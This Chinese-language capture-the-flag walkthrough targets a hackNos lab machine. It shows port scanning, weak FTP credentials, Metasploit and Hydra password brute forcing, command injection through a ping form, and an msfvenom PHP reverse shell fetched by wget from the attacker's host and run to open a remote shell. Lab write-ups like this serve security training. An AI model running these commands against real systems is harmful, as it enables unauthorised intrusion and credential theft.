1. 信息收集
使用nmap
工具进行主机发现目标靶机、使用Nmap进行详细的扫描发现开放了21/22/80端口、对80端口进行目录扫描;
无有用信息
尝试登录FTP服务器使用弱口令ftp:ftp
尝试登录,成功但没有文件....知识在登录的时候看到220欢迎消息“Security@hackNos”
2. 漏洞扫描
访问网站http://192.168.7.102/
点击TroubleShoot
会弹出来一个FTP登录框....使用dirsearch
进行扫描没发现有价值的信息...
使用MSF进行登录爆破,需要将“Security@hackNos
”添加到字典文件中...爆破成功....
加入msf密码字典:
/usr/share/metasploit-framework/data/wordlists/http_default_pass.txt
use auxiliary/scanner/http/http_login
show options # 获知密码的字典位置,把“Security@hackNos”加入到密码字典中
set AUTH_URI /5ecure/
set STOP_ON_SUCCESS true
set RHOSTS 192.168.1.93
exploit
- 根据以上爆破结果得出账户与密码
admin:Security@hackNos
在网页中尝试登录并跳转至以下页面...
- 尝试输入百度去ping百度,从BurpSuite上抓包得到上传的数据包,尝试更改为回环地址测试是否回显-》存在回显;
- 查看
/etc/passwd
文件中发现recon
用户是可以进行登录...
3. 漏洞利用-》反弹shell-》切换用户拿shell
- 使用MSF生成一个PHP木马并开启一个
http
服务提供下载...开启MSF监听模块...并在目标站点上下载并执行PHP代码..
>>>攻击机操作
####生成恶意文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.7.70 lport=4444 -f raw > f4.php
####开启Web服务
python3 -m http.server 80
####开启MSF监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.7.70
exploit
>>>目标靶机操作
wget http%3a//192.168.7.70:80/f4.php # 下载恶意文件
php f4.php # 运行恶意文件
生成恶意文件
开启Web服务
开启MSF监听
- 目标靶机操作执行完所有的上述命令后,查看msf监听端口-》成功反弹shell,并执行命令;
反弹daoshell后执行以下命令
python -c 'import pty; pty.spawn("/bin/bash")'
- 获取第一个
Flag
...使用Hydra对SSH服务进行暴力破解...得出用户密码recon:Security@hackNos
在Shell中进行用户身份切换或登录..
hydra -l recon -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt ssh://192.168.7.102
登录切换ssh用户,获取shell权限